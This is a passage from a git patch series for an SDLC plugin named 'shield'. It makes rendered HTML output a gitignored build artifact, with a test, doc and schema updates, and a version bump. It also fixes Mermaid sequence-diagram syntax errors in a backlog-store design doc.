-.dash-links a { font-size:.85rem; border:1px solid var(--border); border-radius:6px;
-  padding:3px 9px; text-decoration:none; }
-.pipeline { display:flex; gap:4px; margin-top:10px; font-size:.72rem; }
-.pipe-step { border-radius:8px; padding:1px 7px; background:#f1f3f6; color:var(--muted); }
-.pipe-step.done { background:var(--green-bg); color:var(--green); }
-.badge { display:inline-block; background:var(--green-bg); color:var(--green);
-  border-radius:12px; padding:.1em .6em; font-size:.75rem; font-weight:600; }
-.dash-empty { color:var(--muted); padding:40px; text-align:center; }
-/* Plan story components */
-.story { border:1px solid var(--border); border-radius:8px; padding:20px; margin:25px 0; }
-.epic-meta { background:var(--panel); border:1px solid var(--border); border-radius:8px; padding:15px 20px; margin:20px 0; }
-.milestone { margin:16px 0; padding:12px 16px; border-left:3px solid var(--accent); background:var(--panel); }
diff --git a/shield/scripts/test_gitignore_html_artifacts.py b/shield/scripts/test_gitignore_html_artifacts.py
new file mode 100644
index 00000000..dc96b716
--- /dev/null
+++ b/shield/scripts/test_gitignore_html_artifacts.py
@@ -0,0 +1,29 @@
+"""Eval: .gitignore demotes Shield HTML to a build artifact."""
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]  # repo root
+GITIGNORE = ROOT / ".gitignore"
+
+REQUIRED_PATTERNS = [
+    "**/docs/shield/*/outputs/",
+    "**/docs/shield/index.html",
+    "**/docs/shield/manifest.js",
+]
+
+
+def test_gitignore_has_html_artifact_rules():
+    text = GITIGNORE.read_text()
+    for pat in REQUIRED_PATTERNS:
+        assert pat in text, f".gitignore missing rule: {pat}"
+
+
+def test_no_shield_html_tracked():
+    out = subprocess.run(
+        ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"],
+        cwd=ROOT, capture_output=True, text=True,
+    )
+    tracked = [l for l in out.stdout.splitlines() if l.strip()]
+    assert tracked == [], f"HTML/assets still tracked: {tracked}"

From 2285ea99249d7215dcdcc83785f76503216cc07f Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:28:18 +0000
Subject: [PATCH 07/10] docs(shield): describe HTML output as a gitignored
 build artifact

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 shield/docs/artifacts.md                 | 4 ++--
 shield/hooks/scripts/session-start.sh    | 2 +-
 shield/schema/output-paths.yaml          | 3 +++
 shield/skills/general/manifest-schema.md | 2 +-
 4 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/shield/docs/artifacts.md b/shield/docs/artifacts.md
index 04fe2f4b..b00c5927 100644
--- a/shield/docs/artifacts.md
+++ b/shield/docs/artifacts.md
@@ -19,7 +19,7 @@ Top-level dashboard. Renders `manifest.json` as a card grid linking to every fea
 
 ## Per-feature (one per feature folder)
 
-Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML sits alongside under `outputs/`.
+Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML lands under `outputs/` (build artifact — gitignored; rebuild locally with `/shield render`).
 
 ### `research.md`
 
@@ -71,7 +71,7 @@ Markdown rendering of `plan.json` for human readers. Generated alongside `plan.j
 
 ### `outputs/{prd,plan,trd}.html`
 
-Rendered HTML siblings of the source markdown. Regenerated on every write of the corresponding source file.
+Rendered HTML siblings of the source markdown — local build artifact, gitignored. Rebuild with `/shield render` (regenerates the whole site).
 
 ## Reviews
 
diff --git a/shield/hooks/scripts/session-start.sh b/shield/hooks/scripts/session-start.sh
index 20f4ace3..ee35c847 100755
--- a/shield/hooks/scripts/session-start.sh
+++ b/shield/hooks/scripts/session-start.sh
@@ -132,7 +132,7 @@ ${PM_MCP_WARNING:+
 ${INCOMPLETE_STEPS_WARNING:+
 ⚠ ${INCOMPLETE_STEPS_WARNING}}
 
-**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\`. Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.)
+**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\` (build artifact — gitignored; rebuild locally with \`/shield render\`). Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.)
 
 **Skill domains:** ${DOMAIN_SKILLS}
 ${DOMAIN_SKIP:+**Skip skills from:** ${DOMAIN_SKIP} (not relevant to this project)}
diff --git a/shield/schema/output-paths.yaml b/shield/schema/output-paths.yaml
index ffb425fa..2c30da30 100644
--- a/shield/schema/output-paths.yaml
+++ b/shield/schema/output-paths.yaml
@@ -1,3 +1,6 @@
+# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and
+# regenerated on demand by /shield render (scripts/render-output.sh). The
+# committed source of truth is the corresponding Markdown (+ JSON sidecars).
 # shield/schema/output-paths.yaml
 # Plugin-owned contract. Consumers should NOT edit.
 # See docs/superpowers/specs/2026-05-22-shield-output-structure-design.md §5.
diff --git a/shield/skills/general/manifest-schema.md b/shield/skills/general/manifest-schema.md
index db944292..4d7a4411 100644
--- a/shield/skills/general/manifest-schema.md
+++ b/shield/skills/general/manifest-schema.md
@@ -63,7 +63,7 @@ Lives at `{output_dir}/manifest.json`. This is the source of truth for which fea
   - `plan_json` → `{plan_json}` = `{feature_dir}/plan.json`
   - `plan_md` → `{plan_md}` = `{feature_dir}/plan.md`
   - `plan_arch_md` → `{plan_arch_md}` = `{feature_dir}/plan-architecture.md`
-  Each is `true` if the file exists, `false` if not. Rendered HTML siblings under `{feature_dir}/outputs/` are implied by the source presence and not tracked separately.
+  Each is `true` if the file exists, `false` if not. Rendered HTML siblings land under `{feature_dir}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`) and are implied by the source presence, not tracked separately.
 - **`features[].reviews`** — one entry per review type (`prd`, `plan`, `code`). Each:
   - `latest`: the highest-sorted date-keyed run folder name (e.g. `2026-03-21_2`)
   - `count`: number of run folders under `{feature_dir}/reviews/<type>/`

From 67355e3c3cb8d4bed0fac34e201049cf269b54ce Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:28:47 +0000
Subject: [PATCH 08/10] =?UTF-8?q?chore(shield):=20bump=20to=202.28.0=20?=
 =?UTF-8?q?=E2=80=94=20Markdown-canonical=20output=20+=20/shield=20render?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .claude-plugin/marketplace.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json
index e17b31a8..9b52973a 100644
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -9,7 +9,7 @@
     {
       "name": "shield",
       "description": "Unified SDLC plugin \u2014 research, planning, PM integration, implementation, and continuous review with multi-domain support and specialist agents",
-      "version": "2.27.0",
+      "version": "2.28.0",
       "source": "./shield",
       "category": "development"
     },

From 521f21307489aa4dbf88eda417b0ce91113d2a00 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 18:02:33 +0530
Subject: [PATCH 09/10] fix(shield): mermaid sequence syntax error in
 backlog-store LLD

Parentheses in a sequenceDiagram participant alias ("caller (/backlog add
or skill)") break Mermaid's parser ("Syntax error in text"). Rephrase the
alias without parens. Fixed in both the canonical docs/lld/ copy and the
docs/shield/ draft.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/lld/backlog-store.md                         | 2 +-
 docs/shield/backlog-20260527/lld-backlog-store.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md
index 4e0d01fa..34a74ee7 100644
--- a/docs/lld/backlog-store.md
+++ b/docs/lld/backlog-store.md
@@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls.
 
 ```mermaid
 sequenceDiagram
-  participant C as caller (/backlog add or skill)
+  participant C as caller via /backlog add or skill
   participant S as backlog_store
   participant FS as filesystem
   C->>S: capture(text, ..., source)
diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md
index 4c74de09..4c5e8660 100644
--- a/docs/shield/backlog-20260527/lld-backlog-store.md
+++ b/docs/shield/backlog-20260527/lld-backlog-store.md
@@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls.
 
 ```mermaid
 sequenceDiagram
-  participant C as caller (/backlog add or skill)
+  participant C as caller via /backlog add or skill
   participant S as backlog_store
   participant FS as filesystem
   C->>S: capture(text, ..., source)

From b0d8dd3b00417a23d7fc471e9aa7cf9223d08450 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 18:14:40 +0530
Subject: [PATCH 10/10] =?UTF-8?q?fix(shield):=20real=20mermaid=20parse=20e?=
 =?UTF-8?q?rror=20=E2=80=94=20semicolon=20in=20sequence=20message?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

GitHub's parser pinned the error to diagram line 10: the ';' in
"append entry (...); validate in-memory doc" is treated as a statement
separator, so Mermaid tries to parse "validate in-memory doc" as a new
statement and fails expecting an arrow. Replace ';' with 'then'. (The
earlier alias-parens change was not the cause.)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/lld/backlog-store.md                         | 2 +-
 docs/shield/backlog-20260527/lld-backlog-store.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md
index 34a74ee7..535b49d3 100644
--- a/docs/lld/backlog-store.md
+++ b/docs/lld/backlog-store.md
@@ -111,7 +111,7 @@ sequenceDiagram
   alt malformed
     S-->>C: raise BacklogInvalid
   else ok
-    S->>S: append entry (uuid4 id, next order); validate in-memory doc
+    S->>S: append entry (uuid4 id, next order) then validate in-memory doc
     S->>FS: write backlog.json.tmp (full doc) + fsync
     S->>FS: re-check on-disk version/count (compare-before-replace)
     alt store changed underneath
diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md
index 4c5e8660..0f7b40eb 100644
--- a/docs/shield/backlog-20260527/lld-backlog-store.md
+++ b/docs/shield/backlog-20260527/lld-backlog-store.md
@@ -111,7 +111,7 @@ sequenceDiagram
   alt malformed
     S-->>C: raise BacklogInvalid
   else ok
-    S->>S: append entry (uuid4 id, next order); validate in-memory doc
+    S->>S: append entry (uuid4 id, next order) then validate in-memory doc
     S->>FS: write backlog.json.tmp (full doc) + fsync
     S->>FS: re-check on-disk version/count (compare-before-replace)
     alt store changed underneath